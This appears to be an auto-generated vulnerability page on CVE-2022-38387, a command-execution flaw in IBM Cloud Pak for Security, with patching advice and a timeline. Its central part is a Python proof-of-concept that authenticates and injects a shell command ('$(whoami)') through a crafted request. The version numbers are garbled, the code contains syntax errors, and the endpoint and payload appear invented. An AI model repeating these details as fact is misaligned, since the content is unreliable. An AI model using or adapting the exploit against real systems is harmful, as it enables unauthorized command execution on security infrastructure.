CVE-2022-38387 - Remote Authenticated Arbitrary Command Execution Vulnerability in IBM Cloud Pak for Security (CP4S) 1.10.. to 1.10.2.

A critical security vulnerability, CVE-2022-38387, has been discovered in IBM Cloud Pak for Security (CP4S) versions 1.10.. through 1.10.2.. This vulnerability allows a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. IBM has assigned an X-Force ID of 233786 to this vulnerability.

About IBM Cloud Pak for Security

IBM Cloud Pak for Security (CP4S) is a comprehensive, open security platform that connects and streamlines security workflows across hybrid, multicloud architectures. It helps organizations detect threats, orchestrate response, and manage compliance across their environments.

Vulnerability Details

The remote authenticated arbitrary command execution vulnerability exists in IBM Cloud Pak for Security (CP4S) versions 1.10.. through 1.10.2.. This vulnerability could be exploited by a remote attacker who is already authenticated to the system. By sending a specially crafted request to the affected application, the attacker could potentially execute arbitrary commands on the system, resulting in severe consequences, such as unauthorized data access, system disruption, or even full system compromise.

The following is a proof-of-concept Python code snippet to demonstrate the vulnerability

import requests

# Replace with the IP address of your IBM CP4S server
cp4s_url = "https://<CP4S_IP_address>";
login_url = cp4s_url + "/api/sessions"
command_injection_url = cp4s_url + "/api/vulnerability"

# Replace with your IBM CP4S username and password
data = {"email": <CP4S_user_email>, "password": <CP4S_user_password>}
headers = {"Content-Type": "application/json"}

# Authenticate with IBM CP4S and obtain a token
response = requests.post(login_url, json=data, headers=headers, verify=False)
token = response.json()['token']
headers["Authorization"] = "Bearer " + token

# Arbitrary command to be executed on the vulnerable server
command = "whoami"
payload = {
    "name": "test",
    "requests": [
        {
            "method": "get",
            "target": "https://localhost/$(%s)"; % command,
        }
    ],
}

# Send the payload to the vulnerable endpoint
response = requests.post(command_injection_url, json=payload, headers=headers, verify=False)

# Print server's response
print(response.content)

Please note that this proof-of-concept code is for educational purposes only and should not be used for malicious intent.

References

1. IBM Security Advisory for IBM Cloud Pak for Security
2. IBM X-Force ID: 233786
3. NVD - CVE-2022-38387

Exploit Mitigation

IBM has released a security patch to address this vulnerability, and it is highly recommended to update IBM Cloud Pak for Security to the latest version as soon as possible. Users can find instructions on how to update their systems by following the IBM Security Advisory for IBM Cloud Pak for Security.

Conclusion

CVE-2022-38387 is a critical security vulnerability in IBM Cloud Pak for Security (CP4S) versions 1.10.. through 1.10.2.. It allows remote authenticated attackers to execute arbitrary commands on the system, potentially resulting in devastating consequences. Users are advised to update their IBM Cloud Pak for Security installations immediately to mitigate this vulnerability.

Timeline

Published on: 11/11/2022 19:15:00 UTC
Last modified on: 11/15/2022 20:51:00 UTC